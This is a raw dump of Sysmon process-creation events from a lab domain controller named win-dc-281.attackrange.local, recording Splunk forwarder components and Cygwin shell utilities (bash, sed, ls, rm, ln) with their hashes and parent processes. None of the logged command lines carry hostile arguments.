14:58:16.379{A8622C2F-5488-6078-BF0C-00000000AE01}1736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000058904Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:22.830{A8622C2F-5452-6078-BE0C-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:20.985{A8622C2F-5450-6078-BD0C-00000000AE01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:20.319{A8622C2F-5450-6078-BC0C-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
14:56:03.159{A8622C2F-5403-6078-750C-00000000AE01}1408C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5403-6078-740C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057935Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.150{A8622C2F-5403-6078-740C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.142{A8622C2F-5403-6078-730C-00000000AE01}1736C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5403-6078-720C-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057913Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:03.134{A8622C2F-5403-6078-720C-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057903Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.126{A8622C2F-5403-6078-710C-00000000AE01}6884C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5403-6078-700C-00000000AE01}5996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057893Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.118{A8622C2F-5403-6078-700C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057883Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:03.109{A8622C2F-5403-6078-6F0C-00000000AE01}4424C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5403-6078-6E0C-00000000AE01}4476C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.101{A8622C2F-5403-6078-6E0C-00000000AE01}4476C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-6D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.092{A8622C2F-5403-6078-6D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:03.084{A8622C2F-5403-6078-6C0C-00000000AE01}1476C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-6B0C-00000000AE01}6196C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057841Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.075{A8622C2F-5403-6078-6B0C-00000000AE01}6196C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-690C-00000000AE01}1156C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.067{A8622C2F-5403-6078-6A0C-00000000AE01}4788C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-690C-00000000AE01}1156C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:03.059{A8622C2F-5403-6078-690C-00000000AE01}1156C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057807Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.050{A8622C2F-5403-6078-680C-00000000AE01}5184C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5403-6078-670C-00000000AE01}1028C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.042{A8622C2F-5403-6078-670C-00000000AE01}1028C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-650C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:03.034{A8622C2F-5403-6078-660C-00000000AE01}4364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-650C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057775Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.026{A8622C2F-5403-6078-650C-00000000AE01}3200C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057763Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.018{A8622C2F-5403-6078-640C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5403-6078-630C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057753Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:03.009{A8622C2F-5403-6078-630C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057741Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.001{A8622C2F-5403-6078-620C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-610C-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057731Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.993{A8622C2F-5402-6078-610C-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057721Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.985{A8622C2F-5402-6078-600C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-5F0C-00000000AE01}5996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057711Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.977{A8622C2F-5402-6078-5F0C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.968{A8622C2F-5402-6078-5E0C-00000000AE01}6552C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-5D0C-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057691Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.960{A8622C2F-5402-6078-5D0C-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-5C0C-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.952{A8622C2F-5402-6078-5C0C-00000000AE01}5776C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.943{A8622C2F-5402-6078-5B0C-00000000AE01}6748C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-5A0C-00000000AE01}4412C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.935{A8622C2F-5402-6078-5A0C-00000000AE01}4412C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-580C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.926{A8622C2F-5402-6078-590C-00000000AE01}1496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-580C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.918{A8622C2F-5402-6078-580C-00000000AE01}5832C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.910{A8622C2F-5402-6078-570C-00000000AE01}4696C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-560C-00000000AE01}1408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.901{A8622C2F-5402-6078-560C-00000000AE01}1408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-540C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057605Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.893{A8622C2F-5402-6078-550C-00000000AE01}6240C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-540C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057593Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.885{A8622C2F-5402-6078-540C-00000000AE01}1100C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.877{A8622C2F-5402-6078-530C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-520C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057571Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.869{A8622C2F-5402-6078-520C-00000000AE01}6076C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.860{A8622C2F-5402-6078-510C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-500C-00000000AE01}5904C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.852{A8622C2F-5402-6078-500C-00000000AE01}5904C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057539Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.845{A8622C2F-5402-6078-4F0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-4E0C-00000000AE01}924C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 